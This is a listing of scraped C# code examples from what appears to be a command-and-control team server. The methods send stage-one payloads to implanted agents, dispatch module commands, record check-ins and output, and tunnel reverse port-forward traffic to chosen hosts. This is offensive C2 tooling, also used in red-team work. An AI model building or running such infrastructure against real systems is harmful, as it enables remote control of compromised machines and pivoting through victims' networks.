Example #1
0
        private void HandleStageOneRequest(AgentMetadata metadata, C2Data c2Data)
        {
            var stage = PayloadControllerBase.GenerateStageOne(new StageRequest
            {
                TargetFramework = TargetFramework.Net40
            });

            Agent.SendDataToAgent(metadata.AgentID, "", "StageOne", stage);
        }
Example #2
0
        private void HandleC2Data(AgentMetadata metadata, C2Data c2Data)
        {
            OnServerCommand CallBack;

            try
            {
                CallBack = ServerModules
                           .Where(m => m.Name.Equals(c2Data.Module, StringComparison.OrdinalIgnoreCase))
                           .Select(m => m.ServerCommands).FirstOrDefault()
                           .Where(c => c.Name.Equals(c2Data.Command, StringComparison.OrdinalIgnoreCase))
                           .Select(c => c.CallBack).FirstOrDefault();
            }
            catch
            {
                return;
            }

            CallBack?.Invoke(metadata, c2Data);
        }
        private void DataFromAgent(AgentMetadata metadata, C2Data c2Data)
        {
            var packet = Serialisation.DeserialiseData <ReversePortForwardPacket>(c2Data.Data);

            if (!IPAddress.TryParse(packet.ForwardHost, out IPAddress ipAddress))
            {
                ipAddress = Dns.GetHostEntry(packet.ForwardHost).AddressList[0];
            }

            var endPoint = new IPEndPoint(ipAddress, packet.ForwardPort);
            var sender   = new Socket(ipAddress.AddressFamily, SocketType.Stream, ProtocolType.IP);

            sender.Connect(endPoint);
            var bytesSent = sender.Send(packet.Data);

            if (bytesSent > 0)
            {
                Log.Logger.Information("MODULE {ModuleName} {Data}", "ReversePortForward", $"{bytesSent} bytes sent");
            }

            var buffer    = new byte[65535];
            var bytesRecv = sender.Receive(buffer);

            if (bytesRecv > 0)
            {
                packet.Data = buffer.TrimBytes();

                Agent.SendAgentCommand(new AgentCommandRequest
                {
                    AgentId = c2Data.AgentID,
                    Module  = "rportfwd",
                    Command = "DataFromTeamServer",
                    Data    = Convert.ToBase64String(Serialisation.SerialiseData(packet))
                }, null);
            }

            sender.Shutdown(SocketShutdown.Both);
            sender.Close();
        }
Example #4
0
        private void RegisterAgentModule(AgentMetadata metadata, C2Data c2Data)
        {
            var moduleInfo = Serialisation.DeserialiseData <AgentModule>(c2Data.Data);

            Agent.RegisterAgentModule(metadata, moduleInfo);
        }
Example #5
0
        private void HandleAgentError(AgentMetadata metadata, C2Data c2Data)
        {
            var error = Encoding.UTF8.GetString(c2Data.Data);

            OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.AgentError, error));
        }
Example #6
0
        private void HandleAgentOutput(AgentMetadata metadata, C2Data c2Data)
        {
            var output = Encoding.UTF8.GetString(c2Data.Data);

            OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.CommandResponse, output));
        }
Example #7
0
 private void HandleAgentCheckin(AgentMetadata metadata, C2Data c2Data)
 {
     Agent.UpdateSession(metadata);
 }